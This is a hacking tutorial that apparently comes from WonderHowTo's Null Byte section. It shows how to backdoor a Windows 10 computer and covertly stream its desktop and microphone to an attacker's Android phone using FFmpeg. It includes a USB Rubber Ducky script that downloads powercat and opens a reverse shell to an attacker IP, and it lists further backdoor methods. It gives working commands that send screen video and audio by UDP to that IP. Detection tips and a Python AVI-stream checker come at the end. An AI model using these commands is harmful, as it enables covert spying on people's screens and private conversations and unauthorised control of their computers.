
How Backdoor Windows 10 & Livestream Desktop (Without RDP) «Zero Byte :: WonderHowTo



The Windows 10 desktop and microphone can be streamed without using RDP (Remote Desktop Protocol) software and without opening any ports on the target computer. A hacker with low user permissions can monitor and exfiltrate a target's every move and private conversation in real time, no matter where they are. Hackers are watching and listening, and there are few ways to protect yourself.

Understanding the FFmpeg Attack

FFmpeg is a multimedia framework that can encode, stream and play most file formats on Windows, MacOS and Unix-based distributions. It is a portable and standalone software, which means that it can run as a single executable without installation or configuration.

The hacker installs the FFmpeg software on both the attacker system and the target Windows 10 computer. They start a listener on the attacking Android system that captures the incoming video stream from the Windows 10 computer. The video stream is saved to a local file and played back on the Android device.

Below is an example live stream created from a compromised Windows 10 desktop and received on an Android phone. The frame rate is a bit low, which was done deliberately to minimize the CPU load on the target machine and to create a smaller video file (AVI) on the Android device.

Just as macOS can be secretly hacked to stream the entire desktop, Windows 10 is equally vulnerable to such attacks. Even at a low frame rate, an attacker can monitor a target's every move in real time.

These attacks can be performed quickly without administrative privileges by simply downloading the FFmpeg executable and running a single command, all without the target's knowledge or detection by antivirus software.

Step 1: Backdoor the Target Windows 10 Computer

This article assumes that a remote backdoor (Netcat) has already been set up. Taking control of a Windows 10 device can be done in several ways, including:

Option 1: USB Rubber Ducky

The USB Rubber Ducky is a popular keystroke injection tool. As shown in my second guide on using an Android phone and a USB Rubber Ducky to backdoor Windows 10, the Ducky script below can create a root shell in seconds through PowerShell.

  DELAY 5500
  GUI r
  DELAY 700
  STRING powershell /w 1 /C $a=$env:TEMP; Set-ExecutionPolicy Bypass; wget https://cutt.ly/cW13i -o $a ipmo $a powercat -c 192.168.0.208 -p 1234 -e powershell
  CTRL-SHIFT ENTER
  DELAY 850
  ALT y


Option 2: Bypass the Login Password

Similarly, where physical access is possible, a Windows 10 computer can be backdoored by dropping a malicious file in the Startup directory.

Windows maintains "Startup" folders to launch programs automatically at startup. This was designed for convenience and allows users to place legitimate program shortcuts (such as web browsers, word processors, media players) and scripts in the Startup folder at any time. Startup folders are commonly abused by attackers to establish some degree of persistence on the device.

In my guide to breaking into a Windows 10 computer without a password, a simple Msfvenom payload is used to control the Windows 10 device remotely. Realistically, though, a more sophisticated undetectable payload or a sophisticated PowerShell payload can be used to maintain persistence.

Option 3: USB Dead Drop

USB dead drops are a useful technique for compromising computers. This topic is covered in depth in my guide to hacking WPA2 Wi-Fi passwords with USB dead drops. The payload chosen there is intended for exfiltrating Wi-Fi passwords, but it can be replaced with other PowerShell payloads that interact with Netcat listeners.

Option 4: E-mail attachment with an undetectable payload

In my guide on creating an undetectable payload, the payload is disguised as an ordinary PDF or TXT file, which makes it possible to email malicious attachments. Below is a GIF of an executable disguised as a text file.

Make no mistake, the file on the right is an executable. When the fake text file is clicked, it opens a new document in Notepad, the default text editor in Windows 10. After opening Notepad, an embedded PowerShell payload is executed that creates a backdoor into the Windows 10 computer.

Option 5: Capture and decrypt the login password

If a Wi-Fi network is shared with the target Windows 10 computer, it may be possible to capture the NTLM hash (shown below, in red).

NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name and a one-way hash of the user's password. NTLM uses an encrypted protocol to authenticate a user without sending the user's password in plain text over the network.

Unfortunately, the HMAC-MD5 hashing algorithm used by NTLM is still highly susceptible to brute-force attacks, allowing tens of millions of password attempts per minute, even when the attack is performed using older Android phones and Raspberry Pis.

In my guide to intercepting and decrypting Windows passwords, the attack is covered in greater detail. After brute-forcing the target's login password, it would be possible to log in and quickly insert a backdoor with schtasks or the Startup folder.

Option 6: Social Engineering (Other Tactics)

There is no telling how many different ways a target can be tricked into opening a file containing a stager or payload. Innocuous or otherwise unremarkable items like a birthday card or a post-it note can be used to attract and disarm unsuspecting targets. Common, everyday things can set complex social engineering hacks in motion, as shown in my guide to hacking Wi-Fi passwords with a birthday card.

Birthday card sent to the target, payload saved on a microSD card.

Again, the payload described in that article can be replaced with another, more complex PowerShell script. It is the social engineering and human-hacking aspect that should be considered.

Step 2: Set up UserLAnd App on Android

UserLAnd is an Android app that allows you to install Linux distributions alongside the Android OS. This is achieved entirely without rooting or wiping the Android device. Lightweight Kali or Debian operating systems can be up and running in minutes with a few taps.

A Kali operating system is required to follow along; check out Distortion's guide on turning an Android phone into a rootless hacking device, as well as my guide to hacking WPA2 Wi-Fi passwords with Android. They cover both the UserLAnd basics and setting up Kali Linux, Ngrok and the other software you need.

Once you have installed and configured everything, connect to the operating system via SSH with ConnectBot (or JuiceSSH or the built-in SSH client).

Step 3: Install FFmpeg in Kali on Android

First, FFmpeg must be installed on the attacker device to properly receive the live stream from the backdoored Windows 10 computer. Install FFmpeg in Kali (UserLAnd) with the command below.

  sudo apt-get update && sudo apt-get install ffmpeg 

Step 4: Start FFmpeg Listener from Android

To receive incoming feeds, use the command below to start FFmpeg.

  screen ffmpeg -i udp://0.0.0.0:10001 /sdcard/Download/livestream.avi

screen is prepended to the command, which makes it possible to close the UserLAnd SSH session without terminating the running FFmpeg command. Readers are encouraged to learn how to use screen, as it makes it easy to switch between shells.

This FFmpeg command opens UDP port (udp://) 10001 and accepts input (-i) streams on all available interfaces (0.0.0.0). It then saves the stream to the /sdcard/Download/ directory in AVI format with the file name "livestream.avi". The port number and file name can be changed if needed, but always use the /sdcard/Download/ directory so the file is available to the Android OS and the VLC app.

To detach from the screen session without stopping the FFmpeg listener, press Ctrl-a, then d.

Step 5: Install FFmpeg on the Backdoored Windows 10 Computer

All of the following commands in steps 5, 6 and 7 are run through the backdoor on the Windows 10 computer. These steps assume that a Netcat shell has been established.

Run the Invoke-WebRequest (iwr) command below to download the FFmpeg ZIP onto the Windows 10 computer. At the time of writing, the latest version is v20190506-fec4212. To make sure you have the latest version, use the Android browser, go to ffmpeg.zeranoe.com/builds/ and copy the latest version's URL from there.

  iwr -Uri 'https://ffmpeg.zeranoe.com/builds/win64/static/ffmpeg-20190506-fec4212-win64-static.zip' -Outfile $env:TEMP\ffmpeg.zip

Invoke-WebRequest will download (-Uri) the FFmpeg ZIP and save it (-Outfile) to the temp directory ($env:TEMP) with the file name ffmpeg.zip.

Step 6: Unzip the Archive

PowerShell versions > 5.1 have a handy decompression function called Expand-Archive. Expand-Archive can be used to quickly extract ffmpeg.zip in the target's temp directory.

  Expand-Archive -Path $env:TEMP\ffmpeg.zip -DestinationPath $env:TEMP\ffmpeg

Expand-Archive will take the input file (-Path) and unzip it into (-DestinationPath) a new folder named ffmpeg. When it's done, change (cd) into the new ffmpeg directory. Use the wildcard (*) shown below to fill in the version number in the directory name.

  cd "$env:TEMP\ffmpeg\ffmpeg*\bin"

Then list the files in the directory to ensure that ffmpeg.exe is available.

  ls

  Directory: C:\Users\IEUser\AppData\Local\Temp\ffmpeg\ffmpeg-20190116-51978ae-win64-static

  Mode   LastWriteTime   Length    Name
  ----   -------------   ------    ----
  -a---- 1/16/2019 4:14  64969728  ffmpeg.exe
  -a---- 1/16/2019 4:14  64856064  ffplay.exe
  -a---- 1/16/2019 4:14  64877568  ffprobe.exe

As we can see, the executable is available. It is now possible to live stream the target's entire desktop.

Step 7: Live Stream the Windows 10 Desktop

FFmpeg supports several useful output formats. It can stream the entire desktop with or without sound from the target's microphone. Below, streaming video only, audio only, and video and audio at the same time are covered.

Option 1: Video streaming only

To stream only the desktop, without sound, run the ffmpeg.exe command below via the Netcat backdoor.

  .\ffmpeg.exe -f gdigrab -i desktop -f dshow -f avi udp://192.168.0.208:10001

The Graphics Device Interface (-f gdigrab) and DirectShow (-f dshow) Windows components are responsible for rendering graphics and passing them to connected displays and printers. FFmpeg essentially captures these components (-i desktop) and sends the output (udp://) to the attacker's server in AVI (-f avi) format.

When using the above command, remember to change the attacker's IP address (192.168.0.208) to the IP used by the Android device hosting the FFmpeg listener. As the desktop is streamed, the video will be available in the Android Downloads app (or the "Downloads" folder in Files, My Files, or a similarly named app).

For more on GDI and DirectShow and the available command line, check out FFmpeg's documentation on "gdigrab", "desktop" and "dshow".

Option 2: Audio streaming only

In some scenarios it may be more desirable to stream only the audio from the computer's built-in microphone. In this case, first list the available input interfaces built into the Windows 10 computer.

  .\ffmpeg.exe -list_devices true -f dshow -i dummy

  ffmpeg version N-92981-g51978aefe8 Copyright (c) 2000-2019 the FFmpeg developers
  built with gcc 8.2.1 (GCC) 20181201

  [dshow @ 0000021d3560a480] DirectShow audio devices
  [dshow @ 0000021d3560a480]  "Microphone (Realtek High Definition Audio)"
  [dshow @ 0000021d3560a480]     Alternative name "@device_cm_{XXXXXXXXXXXXXXXXXXX}\wave_{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"

Note the "Microphone (Realtek High Definition Audio)" interface in my FFmpeg output. It may differ depending on the hardware and microphone used by the backdoored Windows 10 computer.

Copy and type the audio interface name exactly as it appears in the following command, with double quotes.

  .\ffmpeg.exe -f dshow -i audio="Microphone (Realtek High Definition Audio)" -f avi udp://192.168.0.208:10001

The -i argument instructs FFmpeg to use the audio= input entered when streaming to the attacker's server.

Option 3: Video and audio streaming simultaneously

To stream the entire desktop while recording audio at the same time, use the command below.

  .\ffmpeg.exe -f dshow -i audio="Microphone (Realtek High Definition Audio)":video="desktop" -f avi udp://192.168.0.208:10001

Similar to the audio= argument, here both the video= and audio= inputs are used when streaming to the attacker's server. The input devices are separated by a colon (:) and must always be wrapped in double quotes.

Step 8: Watch and listen to the stream in real time

The built-in Android video player cannot play the streamed video/audio while the file is still being written (streaming). There are other notable video players that can play video files this way, but only VLC was tested for this article. Feel free to replace it with another, equally capable video player. VLC is available through the F-Droid repository and the Google Play store.

After installing VLC, navigate to the Android Downloads app (or the "Downloads" folder in Files, My Files or a similarly named app) to find the "livestream.avi" file. Note how the file size keeps increasing as the Windows 10 desktop is streamed.

To open the file in VLC, select the AVI, then either the more-options icon and "Open with" or the share button, then press "VLC" or "Play with VLC." VLC continues to play the file as long as the FFmpeg connection is established.

How to Protect Yourself against FFmpeg Attacks

It is unlikely that antivirus software will defend against these types of attacks on Windows 10. After all, FFmpeg is not considered a malicious application, and it does not try to open ports or modify sensitive files on the computer.

Option 1: Search for Malicious Programs

If you have never heard of FFmpeg and are sure it was not installed by some other application, then FFmpeg probably has no business being on the computer. A simple search helps find related files on your computer.

First, open Explorer and click "This PC" ("My Computer") in the left-hand column. This step is important; otherwise, it will only search the current directory. Then search for "ffmpeg" in the upper right corner.

Note the FFmpeg EXE and ZIP in the Temp directory. At this point, it is probably best to disconnect the computer from the internet and router and begin a forensic investigation to identify who compromised the device and when.

Option 2: Use the Task Manager to Spot Data-Stealing Apps

If your computer is actively exfiltrating data, the Windows 10 Task Manager can be used to display running background processes, applications and services. It can also be used to analyze system resources, such as identifying programs that consume too much RAM or CPU.

To open the Task Manager, search for "Task Manager" and open it as an administrator by right-clicking on it. The Task Manager must be started with administrator privileges to see anything run by a root backdoor.

Note "ffmpeg.exe" using 30% of the CPU. A patient attacker can tune the FFmpeg command to minimize the total CPU load, so it is not always detectable this way.

To stop FFmpeg, right-click on the process and select "End task". Again, it is probably best to immediately disconnect the computer from the internet and router at this point.

Option 3: Use Wireshark to Spot Data-Stealing Apps

Keep in mind that a smart attacker can rename ffmpeg.exe to something less obvious, such as "explorer.exe" or "service host". For a more comprehensive look at data leaving the Windows 10 computer, download and install the latest version of Wireshark. During the installation, be sure to install WinPcap, as it is a necessary dependency of Wireshark.

Open Wireshark and start capturing on all available interfaces. If an attacker is actively streaming the desktop, a large amount of data will be seen leaving over the network.

It can be difficult to identify a large amount of data leaving the computer as malicious. Windows 10 does a number of things in the background that could be interpreted as shady. Analyzing the individual packets does not help much either. If this is an FFmpeg attack, however, it can be identified with certainty by the following method.

First, right-click a UDP packet and select "Follow" and then "UDP Stream".

A new Wireshark window will pop up. Note "client pkts" in the lower left corner. This number keeps increasing as Wireshark reassembles the UDP packets into a single stream. Be patient here. If the attacker has been streaming for a long time, it can take Wireshark several minutes to complete.

When Wireshark is done, the "Show and save data as" option will be available. Change it to "Raw" and wait for Wireshark to finish reassembling again.

Finally, click "Save As" and save the data with the file name "ive_been_hacked.avi". The video can then be played with the Windows 10 video player. If the AVI is clearly a video of your entire desktop or an audio recording of your private conversations, the computer has been hacked. Disconnect it from the router immediately.

That's all there is to performing and detecting FFmpeg attacks. Follow me on Twitter @tokyoneon_ and let me know if you have any questions or concerns there or below in the comments.
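As an added example (not part of the original article), the Python script below automates the check the Wireshark walkthrough above performs by hand: given the bytes saved from "Follow UDP Stream" in Raw mode, it recognises the AVI container that FFmpeg's -f avi output produces and reads the frame size, frame rate and stream count from its header, and when the capture began after streaming started (no header present) it falls back to counting AVI frame chunks. The sample byte strings are constructed inline; the function names are my own.

```python
import re
import struct

# AVI 'movi' chunk ids look like 00dc/00db (video) and 01wb (audio)
AVI_FRAME_TAGS = re.compile(rb"\d\d(?:dc|db|wb)")

def build_sample_avi_header(width=1280, height=720, fps=5, streams=2) -> bytes:
    """Constructed sample: the bytes an AVI container (FFmpeg -f avi) begins with."""
    # MainAVIHeader ('avih'): 14 little-endian DWORDs; we set usec/frame, flags,
    # stream count, width and height and leave the rest zero
    avih = struct.pack("<14I", 1_000_000 // fps, 0, 0, 0x10, 0, 0, streams, 0,
                       width, height, 0, 0, 0, 0)
    hdrl = b"hdrl" + b"avih" + struct.pack("<I", len(avih)) + avih
    body = b"AVI " + b"LIST" + struct.pack("<I", len(hdrl)) + hdrl
    return b"RIFF" + struct.pack("<I", len(body)) + body

def build_sample_fragment(frames=5) -> bytes:
    """Constructed sample: a capture that began mid-stream, so only movi chunks are seen."""
    video = b"00dc" + struct.pack("<I", 6) + b"\xaa" * 6
    audio = b"01wb" + struct.pack("<I", 4) + b"\xbb" * 4
    return (video + audio) * frames

def parse_avih(data: bytes, start: int) -> dict:
    """Walk RIFF chunks from 'start' (offset of b'RIFF') and return main-header fields."""
    pos = start + 12                                  # skip 'RIFF', size, 'AVI '
    while pos + 12 <= len(data):
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        if fourcc == b"LIST" and data[pos + 8:pos + 12] == b"hdrl":
            sub, end = pos + 12, min(pos + 8 + size, len(data))
            while sub + 8 <= end:
                tag = data[sub:sub + 4]
                sz = struct.unpack_from("<I", data, sub + 4)[0]
                if tag == b"avih" and sub + 8 + 40 <= len(data):
                    f = struct.unpack_from("<10I", data, sub + 8)
                    fps = round(1_000_000 / f[0], 2) if f[0] else None
                    return {"fps": fps, "streams": f[6], "width": f[8], "height": f[9]}
                sub += 8 + sz + (sz & 1)              # chunks are word-aligned
        pos += 8 + size + (size & 1)
    return {}

def classify_udp_stream(data: bytes) -> dict:
    """Verdict 'avi' (with header details), 'avi-fragment' (frame chunks only) or 'unknown'."""
    # The RIFF header is only at offset 0 if the capture caught the start of the stream
    start = 0
    while (start := data.find(b"RIFF", start)) != -1:
        if data[start + 8:start + 12] == b"AVI ":
            return {"verdict": "avi", **parse_avih(data, start)}
        start += 4
    frames = sum(1 for _ in AVI_FRAME_TAGS.finditer(data))
    if frames >= 3:
        return {"verdict": "avi-fragment", "frame_chunks": frames}
    return {"verdict": "unknown", "frame_chunks": frames}
```

To use it on a real capture, read the file Wireshark saved as Raw with `open(path, "rb").read()` and pass the bytes to classify_udp_stream.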

Do not miss: Break into Windows 10 Computers without password

Cover photo and screenshots of tokyoneon / Zero byte



